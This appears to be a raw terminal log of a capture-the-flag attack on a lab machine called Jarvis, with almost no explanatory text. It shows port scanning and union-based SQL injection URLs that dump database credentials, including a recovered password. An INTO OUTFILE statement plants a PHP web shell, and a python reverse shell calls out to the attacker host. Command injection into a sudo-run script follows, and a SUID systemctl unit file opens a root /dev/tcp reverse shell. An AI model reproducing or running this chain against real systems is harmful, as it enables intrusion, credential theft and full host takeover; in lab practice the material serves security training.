└─$ nmap -p- -sSCV 10.10.10.143  --min-rate 999
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-12 17:49 AEST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 16.01% done; ETC: 17:50 (0:00:58 remaining)
Nmap scan report for 10.10.10.143
Host is up (0.13s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Stark Hotel
|_http-server-header: Apache/2.4.25 (Debian)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

[17:52:34] 301 -  310B  - /css  ->  http://10.10.10.143/css/
[17:52:39] 301 -  312B  - /fonts  ->  http://10.10.10.143/fonts/
[17:52:39] 200 -  755B  - /footer.php
[17:52:41] 200 -  814B  - /images/
[17:52:41] 301 -  313B  - /images  ->  http://10.10.10.143/images/
[17:52:43] 200 -  676B  - /js/
[17:52:52] 301 -  317B  - /phpmyadmin  ->  http://10.10.10.143/phpmyadmin/
[17:52:53] 200 -    4KB - /phpmyadmin/
[17:52:53] 200 -    3KB - /phpmyadmin/doc/html/index.html
[17:52:53] 200 -    1KB - /phpmyadmin/README
[17:52:53] 200 -    3KB - /phpmyadmin/index.php
[17:52:53] 200 -   19KB - /phpmyadmin/ChangeLog


http://10.10.10.143/room.php?cod=8 union select 1, group_concat(schema_name),3,4,5,6 ,7 from information_schema.schemata
hotel,information_schema,mysql,performance_schema

http://10.10.10.143/room.php?cod=8%20union%20select%201,group_concat(table_name),3,4,5,6%20,7%20from%20information_schema.tables
room,ALL_PLUGINS,APPLICABLE_ROLES,CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENABLED_ROLES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_CACHES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,SYSTEM_VARIABLES,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,GEOMETRY_COLUMNS,SPATIAL_REF_SYS,CLIENT_STATISTICS,INDEX_STATISTICS,INNODB_SYS_DATAFILES,TABLE_STATISTICS,INNODB_SYS_TABLESTATS,USER_STATISTICS,INNODB_SYS_INDEXES,XTRADB_RSEG,INNODB_CMP_PER_INDEX,INNODB_TRX,CHANGED_PAGE_BITMAPS,INNODB_FT_BEING_DELETED,INNODB_LOCK_WAITS,INNODB_LOCKS,INNODB_TABLESPACES_ENCRYPTION,XTRADB_INTERNAL_HASH_TABLES,INNODB_SYS_FIELDS,INNODB_CMPMEM_RESET,INNODB_CMP,INNODB_FT_INDEX_TABLE,INNODB_SYS_TABLESPACES,INNODB_MUTEXES,INNODB_BUFFER_PAGE_LRU,INNODB_SYS_FOREIGN_COLS,INNODB_CMP_RESET,INNODB_BUFFER_POOL_STATS,INNODB_FT

http://10.10.10.143/room.php?cod=8%20union%20select%201,group_concat(column_name),3,4,5,6%20,7%20from%20information_schema.columns%20where%20table_schema=%27hotel%27%20and%20table_name=%27room%27
cod,name,price,descrip,star,image,mini


http://10.10.10.143/room.php?cod=8%20union%20select%201,group_concat(table_name),3,4,5,6%20,7%20from%20information_schema.tables where table_schema = 'mysql'

column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_stats,innodb_table_stats,plugin,proc,procs_priv,proxies_priv,roles_mapping,servers,slow_log,table_stats,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user

http://10.10.10.143/room.php?cod=8%20union%20select%201,group_concat(column_name),3,4,5,6%20,7%20from%20information_schema.columns%20where%20table_schema=%27mysql%27%20and%20table_name=%27user%27

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv

http://10.10.10.143/room.php?cod=8%20union%20select%201,group_concat(User),group_concat(Password),4,5,6%20,7%20from%20mysql.user

DBadmin  *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 imissyou

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"

http://10.10.10.143/shell.php?cmd=id

http://10.10.10.143/shell.php?cmd=export%20RHOST=%2210.10.16.21%22;export%20RPORT=8821;python%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn(%22/bin/bash%22)%27

➜  Pictures nc -nvlp 8821
Listening on 0.0.0.0 8821
Connection received on 10.10.10.143 35784
www-data@jarvis:/var/www/html$ 

www-data@jarvis:/var/www/html$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash

www-data@jarvis:/home/pepper$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py



www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p 
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p 
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: 127.0.0.1 $(bash /tmp/r.sh)
127.0.0.1 $(bash /tmp/r.sh)

Listening on 0.0.0.0 8822
Connection received on 10.10.10.143 48526
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)

python -c 'import pty;pty.spawn("/bin/bash")'

root        790  0.2  1.6  61924 16208 ?        Ss   03:11   0:19 python3 /root/sqli_defender.py

-rwsr-x--- 1 root pepper 171K Jun 29  2022 /bin/systemctl

pepper@jarvis:/tmp$ echo '[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.16.21/8823 0>&1"
[Install]
WantedBy=multi-user.target' > 0xac.serviceecho '[Unit]
> Description=roooooooooot
> [Service]
> Type=simple
> User=root
> ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.16.21/8823 0>&1"
> [Install]
> 
WantedBy=multi-user.target' > 0xac.service
pepper@jarvis:/tmp$ cat 0xac.service
cat 0xac.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.16.21/8823 0>&1"
[Install]
WantedBy=multi-user.target
pepper@jarvis:/tmp$ cp 0xac.service /dev/shm/
cp 0xac.service /dev/shm/
pepper@jarvis:/tmp$ ls /dev/shm
ls /dev/shm
0xab.service  0xac.service
pepper@jarvis:/tmp$ /bin/systemctl enable /dev/shm/0xac.service
/bin/systemctl enable /dev/shm/0xac.service
Created symlink /etc/systemd/system/multi-user.target.wants/0xac.service -> /dev/shm/0xac.service.
Created symlink /etc/systemd/system/0xac.service -> /dev/shm/0xac.service.
pepper@jarvis:/tmp$ /bin/systemctl start 0xac
/bin/systemctl start 0xac
